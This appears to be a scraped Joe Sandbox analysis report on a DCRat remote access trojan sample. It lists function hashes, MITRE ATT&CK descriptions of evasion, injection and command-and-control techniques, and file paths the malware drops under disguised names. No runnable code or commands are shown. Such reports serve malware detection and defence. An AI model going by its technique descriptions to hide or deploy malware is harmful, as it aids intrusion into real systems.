Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89aa688de52aa6f9bca1dd9dd13ec5897a8d7f3f0d1bc6e58be3afee976b2108
Instruction ID: 68f6a50881de1c81c1061b6c2cd5003c383af73e0fdb5e1b983e68b224b7da9b
Opcode Fuzzy Hash: 89aa688de52aa6f9bca1dd9dd13ec5897a8d7f3f0d1bc6e58be3afee976b2108
Instruction Fuzzy Hash: 20D1F034A0EA4A9FD378DBA8D0E857577E5FF44300B21457EC48EC36A2DB2AB9428741

Function 00007FFD9BE781CF Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0ee1230e8bb8d3a6941079f4b2000d644a375d29f0e9a2c6fb32ffcf510ac4
Instruction ID: c8c317a806bb8b3739cd573f2b8c0ad481180358b2973c0ac42d8efd91a54147
Opcode Fuzzy Hash: 9a0ee1230e8bb8d3a6941079f4b2000d644a375d29f0e9a2c6fb32ffcf510ac4
Instruction Fuzzy Hash: D7D1F07061954A8FEB6DCF48C0E05B03BA5FF55300B5546BDC84B8B69BDB38E982CB81

Function 00007FFD9BE781EF Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d708f6b32163d92192988021585375d8b1707d3c8de802a6cb4044eb45aa1a41
Instruction ID: 2a261ecfb4ebcf31eab83253706f6d446787f816c5a5722d231c120ddddf5acb
Opcode Fuzzy Hash: d708f6b32163d92192988021585375d8b1707d3c8de802a6cb4044eb45aa1a41
Instruction Fuzzy Hash: 0AC12270A1A54A8FEB2DCF58C0E01B13BA5FF55301B5545BDC88B8B6ABDB38E941CB41

Function 00007FFD9BE75457 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b54fa0e2b23faa6ae156f3f017bc9a81c18b713871ddd348a5f072ea545dec
Instruction ID: 808020ea6b3f572e308301728e348612f6eef89f82ff8257759808c8e04555dc
Opcode Fuzzy Hash: 38b54fa0e2b23faa6ae156f3f017bc9a81c18b713871ddd348a5f072ea545dec
Instruction Fuzzy Hash: A021D652F1F69B86F77496E418F60F85698EF11325F2A067AD44E870E3EC0E3A415382

Function 00007FFD9BE78560 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e028a45bf1458f266eed8517373c30918c64c3022ed10e9cb07531456efe9aa3
Instruction ID: 631a05d0be37f9d05b184b833723e6345bc7151d22dcda6a539d5d06a4c15f3a
Opcode Fuzzy Hash: e028a45bf1458f266eed8517373c30918c64c3022ed10e9cb07531456efe9aa3
Instruction Fuzzy Hash: D8510670E1D55E8EEBB8DB5488B47F877A1FF64300F1085B9D04EC71A6DE396A848B41

Function 00007FFD9BE74D67 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d6d7f3e74d2d7ad83fdb1ab8aab739c1c6346b3198665fb3af48751193e3fb
Instruction ID: 6a192e55aa1bfeda13a66fa1790ed4049e0cacc478ce71a39c2dee18f3d443e7
Opcode Fuzzy Hash: 61d6d7f3e74d2d7ad83fdb1ab8aab739c1c6346b3198665fb3af48751193e3fb
Instruction Fuzzy Hash: 9A41E732E0E69D4FDB56EBA8D8B04EC7B70FF15328B0501BBD099CB1A3DA296945C741

Function 00007FFD9BE79837 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b44fbd3828e119fcd55bf56f733d65b0ffd3e2d154e84264a5a29c67cdfda7bb
Instruction ID: 1676e816501c0cdfbcfea5f329d7467ef1c2395f264d4a62a206eaec45ff3894
Opcode Fuzzy Hash: b44fbd3828e119fcd55bf56f733d65b0ffd3e2d154e84264a5a29c67cdfda7bb
Instruction Fuzzy Hash: 6841963270C9488FDF98FF18C4A9DA4B3E1FFA8324B1441AAD44EC31A2DE25E845CB41

Function 00007FFD9BE707D1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61919b17b3c90298181905c84a3c85d5726b659d580da0e61150dbe7d4596d8b
Instruction ID: 5db3ef9e607a346cb9c5fc10d34b5dbb1062399d0950beeb056033ef43f7310b
Opcode Fuzzy Hash: 61919b17b3c90298181905c84a3c85d5726b659d580da0e61150dbe7d4596d8b
Instruction Fuzzy Hash: 5231903160C9498FDF9CEF28C4A5EA473E1FF68314B0402A9D44EC7296DE29EC85CB81

Function 00007FFD9BE7076B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3610611ed1cadeb8f6e328602a0e7ed02521a161f27e65f1674f06bb20c75265
Instruction ID: 7f504da749d64e5a6f2b7ca6a7999b62c1947bb3ff7cc9157a7881f36922bc02
Opcode Fuzzy Hash: 3610611ed1cadeb8f6e328602a0e7ed02521a161f27e65f1674f06bb20c75265
Instruction Fuzzy Hash: 4C31523160C9498FDF98EF18C4A5EA477E1FF68314B1442A9D04EC7296DE29FC85CB81

Function 00007FFD9BE79645 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5927e7a3e3efe437844bef8e6858dde243ea2d00cef2d352f365212d6828081
Instruction ID: 33e89f38aa453046ee552139bd6467aaa0b6c5ae44b11678c728b6fbb08f62b6
Opcode Fuzzy Hash: b5927e7a3e3efe437844bef8e6858dde243ea2d00cef2d352f365212d6828081
Instruction Fuzzy Hash: 47316D34A0A94EEFDB68DFD484A95BD77B5FF54300F52027AD01EC71A1DA3A6A008741

Function 00007FFD9BE769AD Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38cd049ee910853fb2d1c4f93b9ee8fba46c39acadff1fb5a13c83102bedddfb
Instruction ID: 8d91232112f12f84286ebffb4e65b952d9732ac6756520899a77984c502af328
Opcode Fuzzy Hash: 38cd049ee910853fb2d1c4f93b9ee8fba46c39acadff1fb5a13c83102bedddfb
Instruction Fuzzy Hash: B221A031B1990A5FDB68DE98C4A1968F3E6FF98300B514139D01EC3692DF25BD12CB80

Function 00007FFD9BE75C52 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1a00f84381fd859470af33c078b5a363123323d3243889b1491254ebf50eb0
Instruction ID: 2a1bea9a2781fd61ee3d453615727279951c81b5f9d328465b87eeea72ac0a0b
Opcode Fuzzy Hash: 5e1a00f84381fd859470af33c078b5a363123323d3243889b1491254ebf50eb0
Instruction Fuzzy Hash: 5AF0623154F2C99FD7228BB088A55953FE8EF43210B1901FAD085CB0A2CA2E5706C761

Function 00007FFD9BE775E0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe2c6aad5dec0045dede1c04792bca0f68c6aa65504d02d843497f08dcd3c973
Instruction ID: 889a011cdfe9e4de2fa0a7d51b1eb85bfafe8c674bc6bc9859fc46ecf86bfdcc
Opcode Fuzzy Hash: fe2c6aad5dec0045dede1c04792bca0f68c6aa65504d02d843497f08dcd3c973
Instruction Fuzzy Hash: 1EF06221B2CD0D4BD6A9EB65C0B1ABA72E5EF98344B81063D904FC75E6DE29B949C340

Function 00007FFD9BE7743B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction ID: 6385cd16edb80154255f3c1aff4a5cee44d619b11345d4564bde9a09f854d3df
Opcode Fuzzy Hash: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction Fuzzy Hash: 87D09228B2E60F85F67996C940F023929EDCF01300E72403DC05F479E6DD1B7B42760A

Function 00007FFD9BE7695F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
Instruction ID: fb42b931c650035d8df7309f54648240dc3ec2e6ba6ae2a4792f13711a965115
Opcode Fuzzy Hash: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
Instruction Fuzzy Hash: 69C04C40F1E2465AE63551E004E10BC06648B573457560572D1068B1E3D84D6B055251

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vb8DOBZQ4X.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe

C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe:Zone.Identifier

C:\Program Files (x86)\Windows Sidebar\Gadgets\GSwhJpqdkmruXxiphyV.exe

C:\Program Files (x86)\Windows Sidebar\Gadgets\GSwhJpqdkmruXxiphyV.exe:Zone.Identifier

C:\Program Files (x86)\Windows Sidebar\Gadgets\ebad0b34ee7c31

C:\Program Files (x86)\Windows Sidebar\ebad0b34ee7c31

C:\Program Files (x86)\jDownloader\config\GSwhJpqdkmruXxiphyV.exe

C:\Program Files (x86)\jDownloader\config\GSwhJpqdkmruXxiphyV.exe:Zone.Identifier

C:\Program Files (x86)\jDownloader\config\ebad0b34ee7c31

C:\Users\Default\Saved Games\OfficeClickToRun.exe

C:\Users\Default\Saved Games\OfficeClickToRun.exe:Zone.Identifier

C:\Users\Default\Saved Games\e6c9b481da804f

Windows Analysis Report
vb8DOBZQ4X.exe